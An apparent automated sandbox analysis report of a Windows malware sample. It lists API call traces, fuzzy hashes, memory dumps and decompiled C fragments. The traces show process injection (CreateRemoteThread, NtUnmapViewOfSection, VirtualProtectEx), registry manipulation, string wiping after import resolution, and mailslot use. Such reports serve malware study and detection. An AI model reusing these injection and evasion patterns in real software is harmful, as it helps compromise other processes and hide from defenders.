  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 5
  • API ID: VirtualAllocVirtualFreelstrcpynmemcpy
  • String ID: Apr 14 2018$pnls$pnls
  • API String ID: 1980370899-1480254790
  • Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
  • Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
  • Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
  • Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
APIs
  • lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
  • memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			// Decompiler output for the PE entry point; the call references are listed under APIs below.
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed: handle of the sample's own image
				_t2 = HeapCreate(0, 0x10000, 0); // executed: private growable heap, 64 KiB initial size
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed: starts the two worker threads (00401034, 004010FB) and waits on them
				}
				ExitThread(_t3); // ends the entry thread with the worker result; the process stays alive while other threads run
			}

(Disassembly of _entry_, 0x00401012..0x0040102d: only the instruction-address column survived extraction; the call sites are given under APIs below.)

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
